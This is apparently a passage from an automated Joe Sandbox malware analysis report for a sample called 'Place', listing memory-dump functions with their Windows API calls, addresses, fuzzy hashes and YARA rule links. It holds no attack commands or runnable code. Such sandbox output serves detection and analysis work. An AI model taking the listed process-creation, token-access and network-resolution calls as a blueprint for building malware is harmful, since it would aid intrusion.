Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 72061d13eef5c48af92c036a725ce54674ff211f2e8183b35d2e6ef94e443a80
Instruction ID: 4edeb0ac8514b7935aa4876dd42f0afb88616604cffe8752220b7b0a06d5104b
Opcode Fuzzy Hash: 72061d13eef5c48af92c036a725ce54674ff211f2e8183b35d2e6ef94e443a80
Instruction Fuzzy Hash: DE117236100345AFDB25AF68D84AD7E7BA9FF45350B40902BF806CB3A0EB719990D791

Function 005B5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005B5331

Part of subcall function 005A593C: __FF_MSGBANNER.LIBCMT ref: 005A5953
Part of subcall function 005A593C: __NMSG_WRITE.LIBCMT ref: 005A595A
Part of subcall function 005A593C: RtlAllocateHeap.NTDLL(00FC0000,00000000,00000001,?,00000004,?,?,005A1003,?), ref: 005A597F

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 1b82a863a30fc79ba41d43938675cb7dbdb29c1d2dd1a6668f5462a9a45a7ce6
Instruction ID: b0fc1e75aaa3d0b8d86955de0258af6e026643a40196b06a4b0f1bf7bb0ee60e
Opcode Fuzzy Hash: 1b82a863a30fc79ba41d43938675cb7dbdb29c1d2dd1a6668f5462a9a45a7ce6
Instruction Fuzzy Hash: 3E11EB31505A17AFCB282F74AC097EE3FD47F563E0F104D26F5149A291EEB499408750

Function 005E4365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 005E4385
_memset.LIBCMT ref: 005E43A6
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 005E43F8
CloseHandle.KERNEL32(00000000), ref: 005E4401

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 7a9341a0cec6786bfa47f9643f4966d6b524c5648a46eb44b5b5af2d7bdd89d7
Instruction ID: 8c0d961b8557a7ec3d9aad9912a28e8cdaba93dd9b2c0578c69352f9b04c9d5d
Opcode Fuzzy Hash: 7a9341a0cec6786bfa47f9643f4966d6b524c5648a46eb44b5b5af2d7bdd89d7
Instruction Fuzzy Hash: C9110A759013287AE7309BA5AC4DFEFBB7CEF45720F04459AF908E7280D2744E808BA4

Function 005F6A54 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0059402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,005E7E51,?,?,00000000), ref: 00594041
Part of subcall function 0059402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,005E7E51,?,?,00000000,?,?), ref: 00594065

gethostbyname.WSOCK32(?,?,?), ref: 005F6A84
WSAGetLastError.WSOCK32(00000000), ref: 005F6A8F
_memmove.LIBCMT ref: 005F6ABC
inet_ntoa.WSOCK32(?), ref: 005F6AC7

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 1a3c113c0d513f4972dc91280bfb167921e6b1f0ba027d4a64c9c2e4f3d53404
Instruction ID: ad50b1be9b4b197b97ee671f69e7cb24bfae50f00e580d07aa71c983b31253e1
Opcode Fuzzy Hash: 1a3c113c0d513f4972dc91280bfb167921e6b1f0ba027d4a64c9c2e4f3d53404
Instruction Fuzzy Hash: 14114F7550010AAFCF00FBA4C94ACEEBBB9BF54310B144165FA02A7261DF70AE40DB91

Function 0058166C Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 005829E2: GetWindowLongW.USER32(?,000000EB), ref: 005829F3

DefDlgProcW.USER32(?,00000020,?), ref: 005816B4
GetClientRect.USER32(?,?), ref: 005BB93C
GetCursorPos.USER32(?), ref: 005BB946
ScreenToClient.USER32(?,?), ref: 005BB951

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 16879c5af0afc917b67e83325774d9eec47ad165a73e79129e3edd3a14f6977b
Instruction ID: 7b5f2a2524197901e6a2149471c7cabb43573a81ad959af7d0fa79996408571d
Opcode Fuzzy Hash: 16879c5af0afc917b67e83325774d9eec47ad165a73e79129e3edd3a14f6977b
Instruction Fuzzy Hash: 7A11493550041AABDF00EF55C8899FE7BBAFB44300F044456FD81E7540D770BA92CBA5

Function 005D96F9 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 005D9719
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005D972B
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005D9741
SendMessageW.USER32(?,000000C9,?,00000000), ref: 005D975C

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: ad4616141234d29a216e5b1f5e64eccfd9bd2eb846014b84de839d13f8fcc3dc
Instruction ID: 4c91a01b1ca0c6010be5de15525447602cef3aec7d792edf4fb5916d6c91d590
Opcode Fuzzy Hash: ad4616141234d29a216e5b1f5e64eccfd9bd2eb846014b84de839d13f8fcc3dc
Instruction Fuzzy Hash: 6A114879900218FFEB10DF99C984EDDBBB8FB49710F204092E900B7290D6716E10DB90

Function 00582111 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0058214F
GetStockObject.GDI32(00000011), ref: 00582163
SendMessageW.USER32(00000000,00000030,00000000), ref: 0058216D

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: e260a2c4a17e3996292ca101c03b6eedbf158f5062f716054e451e03084daa0a
Instruction ID: 486b6f80a5cc0ab2a8eec1c7250565c9c96b5040115815a7d9c0dab86ea37669
Opcode Fuzzy Hash: e260a2c4a17e3996292ca101c03b6eedbf158f5062f716054e451e03084daa0a
Instruction Fuzzy Hash: 6F118B7210124DBFEF029FA09C49EEA7F6AFF59354F154112FA0462064C771DCA0EBA0

Function 005E1941 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005E04EC,?,005E153F,?,00008000), ref: 005E195E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,005E04EC,?,005E153F,?,00008000), ref: 005E1983
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,005E04EC,?,005E153F,?,00008000), ref: 005E198D
Sleep.KERNEL32(?,?,?,?,?,?,?,005E04EC,?,005E153F,?,00008000), ref: 005E19C0

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: 930d3071452bdc49e33db495ac8b02d1b3bbcaf787468e370fd302e12157424d
Instruction ID: 449da885c27969b32f74e3d452f3a54a89b8950dc2651ab99afc3c5e60833ab6
Opcode Fuzzy Hash: 930d3071452bdc49e33db495ac8b02d1b3bbcaf787468e370fd302e12157424d
Instruction Fuzzy Hash: DA117C31C0095DEBDF049FE6D959AEEBF79FF08751F048046E980B2242CB3496908B99

Function 0060E1CE Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0060E1EA
LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0060E201
RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0060E216
RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0060E234

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 4cc95d28e312f84c35feaa8aa36542554b50600ce6923898a12dd042d19b7662
Instruction ID: c8ba411f20081c0eb3d601c729d23d6e49dbd5d9fd2ef72dc120fbb32eac4b3e
Opcode Fuzzy Hash: 4cc95d28e312f84c35feaa8aa36542554b50600ce6923898a12dd042d19b7662
Instruction Fuzzy Hash: 4B1161B5245324EBE7348F51DD08F93BBFDEB40B00F10895AE616D6190D7B1EA449BA1

Function 005B71E7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 005B720B

Part of subcall function 005B78F2: __fltout2.LIBCMT ref: 005B791B

__cftog_l.LIBCMT ref: 005B7231
__cftoe_l.LIBCMT ref: 005B7263

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: deb7bfff82b6e6c7d1a3f514364f3be60e40f80fcd04af55bfe517f215642557
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: E501893A04814EBBCF126E84CC058EE7F22FB9D340F198915FA1868131C336E9B1AB81

Function 0060B937 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0060B956
ScreenToClient.USER32(?,?), ref: 0060B96E
ScreenToClient.USER32(?,?), ref: 0060B992
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0060B9AD

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: fcc9a9fa1948a9d3d422a7010109bc92c1cd2994c210875d6eb60119e71dac81
Instruction ID: afe720488c16e3fb711d69d9e7ae3d367b3ecf7d0ed751a3a9050f61830c6900
Opcode Fuzzy Hash: fcc9a9fa1948a9d3d422a7010109bc92c1cd2994c210875d6eb60119e71dac81
Instruction Fuzzy Hash: BE1143B9D00209EFDB41CF98C984AEEBBF9FB48310F109156E914E3610D775AA658F90

Function 0060BCA7 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0060BCB6
_memset.LIBCMT ref: 0060BCC5
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00648F20,00648F64), ref: 0060BCF4
CloseHandle.KERNEL32 ref: 0060BD06

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 9a2e1bcb5c4337fb9b946103704e68010db2bfb68d14406105b36c3367cc7b39
Instruction ID: 11d20b2da8a4c9ad12f5acb80268064202db36d52248d0985f6741888d38cdf7
Opcode Fuzzy Hash: 9a2e1bcb5c4337fb9b946103704e68010db2bfb68d14406105b36c3367cc7b39
Instruction Fuzzy Hash: CCF05EB65403057FF7903B61AC09FFF7E5FEB4A794F046421BA08E61A2DB76481487A8

Function 005E7195 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 005E71A1

Part of subcall function 005E7C7F: _memset.LIBCMT ref: 005E7CB4

_memmove.LIBCMT ref: 005E71C4
_memset.LIBCMT ref: 005E71D1
LeaveCriticalSection.KERNEL32(?), ref: 005E71E1

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 26c1d1c21909230b99eb0f7738404a68abe377390eef1ce59e8c7e704d0eb090
Instruction ID: dacfdc88c07837927fdc2296f4ac95c907d5e9159d1d72f968874b986a594aad
Opcode Fuzzy Hash: 26c1d1c21909230b99eb0f7738404a68abe377390eef1ce59e8c7e704d0eb090
Instruction Fuzzy Hash: DDF0547A100104ABCF016F55DC8DA8ABF29FF89320F08C051FE0C5E21AC771A951DBB4

Function 0060C3C4 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 005816CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00581729
Part of subcall function 005816CF: SelectObject.GDI32(?,00000000), ref: 00581738
Part of subcall function 005816CF: BeginPath.GDI32(?), ref: 0058174F
Part of subcall function 005816CF: SelectObject.GDI32(?,00000000), ref: 00581778

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0060C3E8
LineTo.GDI32(00000000,?,?), ref: 0060C3F5
EndPath.GDI32(00000000), ref: 0060C405
StrokePath.GDI32(00000000), ref: 0060C413

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: c081a826599077932f762e2735c6fa254212e9f0d1567b75bd186b0fd4e0ac52
Instruction ID: bea6f8dc1253f300cffc21b14d4b38f3f58074aac4d80adbd41db811e4fb2afc
Opcode Fuzzy Hash: c081a826599077932f762e2735c6fa254212e9f0d1567b75bd186b0fd4e0ac52
Instruction Fuzzy Hash: 12F0BE31045219BBEF122F54AC0EFCE3F9AAF0A321F089001FA51611E1C7B416A5DBA9

Function 005DAA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 005DAA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 005DAA82
GetCurrentThreadId.KERNEL32 ref: 005DAA89
AttachThreadInput.USER32(00000000), ref: 005DAA90

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: a6dcf3306c4b5e1b9539babdf74dd381e7b006ec91aa7450747f697d8ec75901
Instruction ID: 1c850f8bfbf667ff869f6da86a6fd00840aa6bf4235ec03d3599884e9171d3aa
Opcode Fuzzy Hash: a6dcf3306c4b5e1b9539babdf74dd381e7b006ec91aa7450747f697d8ec75901
Instruction Fuzzy Hash: 5DE03931541228BAEF315FA29D0DEEB3F1EFF117A1F048113F50984050CAB18990CBE0

Function 005825F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0058260D
SetTextColor.GDI32(?,000000FF), ref: 00582617
SetBkMode.GDI32(?,00000001), ref: 0058262C
GetStockObject.GDI32(00000005), ref: 00582634
GetWindowDC.USER32(?,00000000), ref: 005BC1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 005BC1D1
GetPixel.GDI32(00000000,?,00000000), ref: 005BC1EA
GetPixel.GDI32(00000000,00000000,?), ref: 005BC203
GetPixel.GDI32(00000000,?,?), ref: 005BC223
ReleaseDC.USER32(?,00000000), ref: 005BC22E

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 625c5971ae72eb7896283d2c9f62e7231db797316e8848990324ffa336dbee5d
Instruction ID: 9910f26f436f8517561b6f7f644f3ac83f2cdc4588a212260acc7f08eceff029
Opcode Fuzzy Hash: 625c5971ae72eb7896283d2c9f62e7231db797316e8848990324ffa336dbee5d
Instruction Fuzzy Hash: CAE0C931544244BBEF215FB8AC4ABE87F22EB15332F18C366FA69580E1C7B54990DB15

Function 005D9330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 005D9339
OpenThreadToken.ADVAPI32(00000000,?,?,?,005D8F04), ref: 005D9340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005D8F04), ref: 005D934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,005D8F04), ref: 005D9354

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 9d82121848c77beece0e95e0bb05b7edce0221a1f0921ecf96adfb2b6a1a7363
Instruction ID: b614044b834979e267a6c721bf3ef10c945b9ccfd50ebe1effc0f5f3b9442bb4
Opcode Fuzzy Hash: 9d82121848c77beece0e95e0bb05b7edce0221a1f0921ecf96adfb2b6a1a7363
Instruction Fuzzy Hash: 60E086367012119FEB205FB55D0DFD63B6DFF59792F19CC1AB245CA090EA749484C750

Function 005C0679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 005C0679
GetDC.USER32(00000000), ref: 005C0683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 005C06A3
ReleaseDC.USER32(?), ref: 005C06C4

Memory Dump Source

Source File: 0000000B.00000002.2708371845.0000000000581000.00000020.00000001.01000000.00000007.sdmp, Offset: 00580000, based on PE: true

Associated: 0000000B.00000002.2708352257.0000000000580000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000610000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708422037.0000000000636000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708464707.0000000000640000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000B.00000002.2708482839.0000000000649000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_580000_Place.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
